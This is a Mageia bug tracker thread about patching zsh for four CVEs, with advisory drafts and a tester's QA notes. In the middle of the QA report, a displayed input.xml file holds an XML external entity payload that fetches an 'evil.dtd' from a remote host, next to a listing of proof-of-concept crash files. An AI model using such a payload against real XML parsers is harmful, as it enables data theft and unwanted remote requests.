Ubuntu has issued an advisory on March 8: https://usn.ubuntu.com/3593-1/ Mageia 5 and Mageia 6 are also affected.
Whiteboard: (none) => MGA6TOO
The first four CVEs only affect Mageia 5, which we won't be fixing. CVE-2017-18206 and CVE-2018-7548 don't affect Mageia 5. CVE-2017-1820[56] are already fixed in the version in Cauldron. CVE-2018-754[89] affect both Mageia 6 and Cauldron.
Summary: zsh new security issues CVE-2014-1007[0-2], CVE-2016-10714, CVE-2017-1820[56], CVE-2018-754[89] => zsh new security issues CVE-2017-1820[56] and CVE-2018-754[89]Status comment: (none) => Patches available from Ubuntu
Assignee: bugsquad => smelrorCC: (none) => smelror
Advisory ======== Zsh has been updated to fix 2 security issues. It was discovered that Zsh incorrectly handled certain inputs. An attacker could possible use to execute arbitrary code. This issue only affected Ubuntu 17.10. (CVE-2018-7548) It was discovered that Zsh incorrectly handled certain inputs. An attacker could possibly use this to cause a denial of service. (CVE-2018-7549) References ========== https://usn.ubuntu.com/3593-1/ https://nvd.nist.gov/vuln/detail/CVE-2018-7548 https://nvd.nist.gov/vuln/detail/CVE-2018-7549 Files ===== Uploaded to core/updates_testing: zsh-5.3.1-1.1.mga6 zsh-doc-5.3.1-1.1.mga6 from zsh-5.3.1-1.1.mga6.src.rpm
Whiteboard: MGA6TOO => (none)Version: Cauldron => 6Assignee: smelror => qa-bugs
Zsh for Cauldron has also been updated.
You forgot CVE-2017-1820[56] for Mageia 6.
CC: (none) => qa-bugsAssignee: qa-bugs => smelror
Advisory ======== Zsh has been updated to fix 4 security issues. In builtin.c in zsh before 5.4, when sh compatibility mode is used, there is a NULL pointer dereference during processing of the cd command with no argument if HOME is not set. (CVE-2017-18205) In utils.c in zsh before 5.4, symlink expansion had a buffer overflow. (CVE-2017-18206) In subst.c in zsh through 5.4.2, there is a NULL pointer dereference when using ${(PA)...} on an empty array result.(CVE-2018-7548) In params.c in zsh through 5.4.2, there is a crash during a copy of an empty hash table, as demonstrated by typeset -p. (CVE-2018-7549) References ========== https://usn.ubuntu.com/3593-1/ https://nvd.nist.gov/vuln/detail/CVE-2017-18205 https://nvd.nist.gov/vuln/detail/CVE-2017-18206 https://nvd.nist.gov/vuln/detail/CVE-2018-7548 https://nvd.nist.gov/vuln/detail/CVE-2018-7549 Files ===== Uploaded to core/updates_testing: zsh-5.3.1-1.2.mga6 zsh-doc-5.3.1-1.2.mga6 from zsh-5.3.1-1.2.mga6.src.rpm
Assignee: smelror => qa-bugs
CC: qa-bugs => (none)Status comment: Patches available from Ubuntu => (none)
Testing this for Mageia 6 in x86_64 virtualbox. Installed zsh. Switched user to the Z shell andlogged out and in. zsh was active and presented a dialogue for setting up .zshrc. Typing 0 results in a .zshrc containing only a comment. Some useful notes at http://fendrich.se/blog/2012/09/28/no/ Played with the directory commands then updated from updates testing under su. As user ran some of the commands again and used vi to write this report. Familiar commands continued to work as in bash. Globbing examples List all files greater than 20KB in size: $ ls -l pocs/**(Lk+20) -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:35 pocs/gx_ttfReader__Read -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:34 pocs/Ins_IP -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:37 pocs/Ins_JMPR -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:30 pocs/Ins_MDRP -rw-r--r-- 1 lcl lcl 38109 Sep 28 16:27 pocs/Ins_MIRP -rw-r--r-- 1 lcl lcl 788480 Jul 26 2017 pocs/memory-leak-in-ReadPCDImage-9.pcd -rw------- 1 lcl lcl 50888704 Sep 28 23:25 pocs/vgcore.1260 -rw------- 1 lcl lcl 50888704 Sep 29 09:52 pocs/vgcore.4428 Edit the file input.xml wherever it is in the directory structure starting at the current directory. $ pwd /home/lcl/pad $ vi **/input.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]> $ ls qa/xml/public EGPH.TXT input.xml output.xml It would take a few days at least to become familiar with writing functions, which I think would go into the .zshrc file just like in .tcshrc and then be used as commands, so let's skip that part. Global aliases are a new thing and presumably these would normally reside in .zshrc. For this test defining one on the command-line shall suffice. $ alias -g L="|less" $ cat L notebook/notes.belexeuli q That turns cat into a pager. The shell is working for 64-bits.
CC: (none) => tarazed25Whiteboard: (none) => MGA6-64-OK
Re comment 6: yes, 'cat L' is obviously redundant but it shows the principle of global aliases.
Good work Len. Advisory uploaded. Validating.
Keywords: (none) => advisory, has_procedure, validated_updateCC: (none) => sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0168.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED